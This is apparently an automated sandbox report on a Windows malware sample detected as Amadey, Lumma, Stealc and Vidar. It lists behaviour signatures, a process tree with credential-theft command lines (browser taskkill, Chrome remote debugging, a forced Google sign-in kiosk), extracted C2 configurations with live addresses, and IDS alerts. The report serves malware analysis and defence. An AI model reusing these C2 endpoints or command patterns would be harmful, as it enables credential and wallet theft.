Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1549577
MD5:	80780678447355a2bc3157723d80033b
SHA1:	3ca0030f2582c21959f2b5d25cf57a926a4314a1
SHA256:	def526b2c332d0019092a86b5686c4ed246779cd8e3235aef94c4901dfc7d361
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected Credential Flusher

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

Allocates memory in foreign processes

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Creates multiple autostart registry keys

Disable Windows Defender notifications (registry)

Disable Windows Defender real time protection (registry)

Disables Windows Defender Tamper protection

Drops PE files to the document folder of the user

Drops PE files to the user root directory

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies windows update settings

PE file contains section with special chars

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: New RUN Key Pointing to Suspicious Folder

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Connects to many different domains

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the user directory

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

PE file does not import any functions

PE file overlay found

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Sigma detected: Browser Started with Remote Debugging

Sigma detected: CurrentVersion Autorun Keys Modification

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 7552 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 80780678447355A2BC3157723D80033B)

skotes.exe (PID: 7756 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 80780678447355A2BC3157723D80033B)

skotes.exe (PID: 7872 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 80780678447355A2BC3157723D80033B)

skotes.exe (PID: 3608 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 80780678447355A2BC3157723D80033B)

freecam.exe (PID: 7588 cmdline: "C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe" MD5: 704D12A2E64A9B3EBE375594A11F3EE6)

BitLockerToGo.exe (PID: 5664 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

0d287ea527.exe (PID: 7788 cmdline: "C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe" MD5: BD02FBC4F962284AA8C9B6F50781EA8A)

chrome.exe (PID: 2416 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0d287ea527.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 4144 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 --field-trial-handle=2228,i,13965840192898022017,8926137046565118761,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

c4df60870c.exe (PID: 3688 cmdline: "C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe" MD5: 0625BFB508155BF72C447F0819C545A5)

chrome.exe (PID: 2252 cmdline: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5544 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2260,i,3014244038502774906,14661954972306353127,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7324 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2260,i,3014244038502774906,14661954972306353127,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

2f0cb7128a.exe (PID: 8184 cmdline: "C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe" MD5: 9BDCA68B008C8506E9070AA48676D172)

taskkill.exe (PID: 8176 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 2756 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 5336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7340 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 6732 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 6764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 5316 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 8112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

firefox.exe (PID: 2816 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

a8e43ec2b6.exe (PID: 6208 cmdline: "C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe" MD5: 6D60EE79CBE29830A8F4C2F7541D3E6C)

0d287ea527.exe (PID: 7244 cmdline: "C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe" MD5: BD02FBC4F962284AA8C9B6F50781EA8A)

firefox.exe (PID: 5740 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 3520 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 2160 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2276 -parentBuildID 20230927232528 -prefsHandle 2212 -prefMapHandle 2204 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c2f0dfb3-3ec4-49ae-8288-95dd845a4bda} 3520 "\\.\pipe\gecko-crash-server-pipe.3520" 28c8b06d910 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 7616 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3516 -parentBuildID 20230927232528 -prefsHandle 2672 -prefMapHandle 2612 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {88ac05a8-4630-40f5-8a59-e55504046001} 3520 "\\.\pipe\gecko-crash-server-pipe.3520" 28c9d3bac10 rdd MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

c4df60870c.exe (PID: 2328 cmdline: "C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe" MD5: 0625BFB508155BF72C447F0819C545A5)

2f0cb7128a.exe (PID: 1376 cmdline: "C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe" MD5: 9BDCA68B008C8506E9070AA48676D172)

taskkill.exe (PID: 4000 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Threatname: LummaC

{"C2 url": ["mutterissuen.shop", "nightybinybz.shop", "respectabosiz.shop", "standartedby.shop", "bakedstusteeb.shop", "conceszustyb.shop", "worddosofrm.shop", "moutheventushz.shop"], "Build id": "MkfS5f--"}

Threatname: Vidar

{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000015.00000003.2816159407.0000000002AE2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000003.2594123989.000000000076D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000003.2593346442.000000000076D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000003.2593195591.0000000005020000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000023.00000002.2968432437.0000000001588000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialFlusher	Yara detected Credential Flusher	Joe Security
00000001.00000002.1716157140.0000000000941000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000A.00000002.2974865414.000000000110E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.2974865414.000000000110E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000009.00000003.2626495178.0000000000782000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000003.2579817622.0000000000771000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000003.2625482551.000000000077B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000015.00000003.2814519497.0000000002B50000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000021.00000002.2958992788.0000000000171000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000009.00000003.2618539870.000000000076D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.1725053890.0000000000941000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000007.00000002.2708343431.00000000120FE000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000021.00000003.2752270526.0000000004D60000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000012.00000002.3009795349.0000000006161000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000009.00000003.2626432893.000000000077E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1695364791.0000000000F01000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000A.00000002.2959179677.0000000000171000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 0d287ea527.exe PID: 7788	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 0d287ea527.exe PID: 7788	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 0d287ea527.exe PID: 7788	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: c4df60870c.exe PID: 3688	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: c4df60870c.exe PID: 3688	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: c4df60870c.exe PID: 3688	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: c4df60870c.exe PID: 3688	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 2f0cb7128a.exe PID: 8184	JoeSecurity_CredentialFlusher	Yara detected Credential Flusher	Joe Security
Process Memory Space: 0d287ea527.exe PID: 7244	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 0d287ea527.exe PID: 7244	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 0d287ea527.exe PID: 7244	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 0d287ea527.exe PID: 7244	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 0d287ea527.exe PID: 7244	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 5664	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 5664	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 5664	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 37 entries

Unpacked PEs

Source	Rule	Description	Author
10.2.c4df60870c.exe.170000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
33.2.c4df60870c.exe.170000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
18.2.0d287ea527.exe.6160000.2.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.file.exe.f00000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
1.2.skotes.exe.940000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
6.2.skotes.exe.940000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
2.2.skotes.exe.940000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 2 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 3608, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0d287ea527.exe

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe, ParentProcessId: 3688, ParentProcessName: c4df60870c.exe, ProcessCommandLine: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", ProcessId: 2252, ProcessName: chrome.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 3608, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0d287ea527.exe

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T18:45:13.122388+0100	2022930	1	A Network Trojan was detected	20.109.210.53	443	192.168.2.4	49730	TCP
2024-11-05T18:45:51.343661+0100	2022930	1	A Network Trojan was detected	20.109.210.53	443	192.168.2.4	49736	TCP

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T18:44:48.799836+0100	2028371	3	Unknown Traffic	192.168.2.4	60576	104.21.5.155	443	TCP
2024-11-05T18:46:23.446833+0100	2028371	3	Unknown Traffic	192.168.2.4	49880	104.21.5.155	443	TCP
2024-11-05T18:46:24.476584+0100	2028371	3	Unknown Traffic	192.168.2.4	49885	104.21.5.155	443	TCP
2024-11-05T18:46:26.519966+0100	2028371	3	Unknown Traffic	192.168.2.4	49892	104.21.5.155	443	TCP
2024-11-05T18:46:27.967613+0100	2028371	3	Unknown Traffic	192.168.2.4	49897	104.21.5.155	443	TCP
2024-11-05T18:46:29.987297+0100	2028371	3	Unknown Traffic	192.168.2.4	49902	104.21.5.155	443	TCP
2024-11-05T18:46:32.507736+0100	2028371	3	Unknown Traffic	192.168.2.4	49911	104.21.5.155	443	TCP
2024-11-05T18:46:34.051559+0100	2028371	3	Unknown Traffic	192.168.2.4	49915	104.21.5.155	443	TCP
2024-11-05T18:46:36.456983+0100	2028371	3	Unknown Traffic	192.168.2.4	49923	104.21.16.142	443	TCP
2024-11-05T18:46:38.982124+0100	2028371	3	Unknown Traffic	192.168.2.4	49934	104.21.5.155	443	TCP
2024-11-05T18:46:40.508692+0100	2028371	3	Unknown Traffic	192.168.2.4	49949	104.21.5.155	443	TCP
2024-11-05T18:46:40.712975+0100	2028371	3	Unknown Traffic	192.168.2.4	49951	104.21.16.142	443	TCP
2024-11-05T18:46:40.787195+0100	2028371	3	Unknown Traffic	192.168.2.4	49952	104.21.5.155	443	TCP
2024-11-05T18:46:42.516566+0100	2028371	3	Unknown Traffic	192.168.2.4	49964	104.21.16.142	443	TCP
2024-11-05T18:46:43.121000+0100	2028371	3	Unknown Traffic	192.168.2.4	49968	104.21.5.155	443	TCP
2024-11-05T18:46:44.513020+0100	2028371	3	Unknown Traffic	192.168.2.4	49981	104.21.16.142	443	TCP
2024-11-05T18:46:45.027023+0100	2028371	3	Unknown Traffic	192.168.2.4	49984	104.21.5.155	443	TCP
2024-11-05T18:46:46.994220+0100	2028371	3	Unknown Traffic	192.168.2.4	49995	104.21.16.142	443	TCP
2024-11-05T18:46:47.141209+0100	2028371	3	Unknown Traffic	192.168.2.4	49998	104.21.5.155	443	TCP
2024-11-05T18:46:50.475026+0100	2028371	3	Unknown Traffic	192.168.2.4	50021	104.21.5.155	443	TCP
2024-11-05T18:46:51.852584+0100	2028371	3	Unknown Traffic	192.168.2.4	50034	104.21.16.142	443	TCP
2024-11-05T18:46:55.186726+0100	2028371	3	Unknown Traffic	192.168.2.4	50051	104.21.5.155	443	TCP
2024-11-05T18:46:55.545227+0100	2028371	3	Unknown Traffic	192.168.2.4	60467	104.21.16.142	443	TCP
2024-11-05T18:46:58.481039+0100	2028371	3	Unknown Traffic	192.168.2.4	60481	104.21.5.155	443	TCP
2024-11-05T18:47:00.186697+0100	2028371	3	Unknown Traffic	192.168.2.4	60494	104.21.16.142	443	TCP
2024-11-05T18:47:09.018199+0100	2028371	3	Unknown Traffic	192.168.2.4	60560	104.21.5.155	443	TCP
2024-11-05T18:47:10.263364+0100	2028371	3	Unknown Traffic	192.168.2.4	60563	104.21.5.155	443	TCP
2024-11-05T18:47:11.455309+0100	2028371	3	Unknown Traffic	192.168.2.4	60570	104.21.5.155	443	TCP
2024-11-05T18:47:12.987478+0100	2028371	3	Unknown Traffic	192.168.2.4	60572	104.21.5.155	443	TCP
2024-11-05T18:47:14.435829+0100	2028371	3	Unknown Traffic	192.168.2.4	60573	104.21.5.155	443	TCP
2024-11-05T18:47:16.724211+0100	2028371	3	Unknown Traffic	192.168.2.4	60574	104.21.5.155	443	TCP
2024-11-05T18:47:19.633690+0100	2028371	3	Unknown Traffic	192.168.2.4	60575	104.21.5.155	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T18:46:23.653795+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49880	104.21.5.155	443	TCP
2024-11-05T18:46:25.468728+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49885	104.21.5.155	443	TCP
2024-11-05T18:46:37.657750+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49923	104.21.16.142	443	TCP
2024-11-05T18:46:39.592638+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49934	104.21.5.155	443	TCP
2024-11-05T18:46:41.150018+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49952	104.21.5.155	443	TCP
2024-11-05T18:46:41.251881+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49951	104.21.16.142	443	TCP
2024-11-05T18:46:41.282999+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49949	104.21.5.155	443	TCP
